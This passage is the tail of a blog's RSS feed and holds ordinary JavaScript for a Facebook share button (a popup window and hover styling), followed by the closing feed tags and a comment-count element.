			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_1') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=1</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

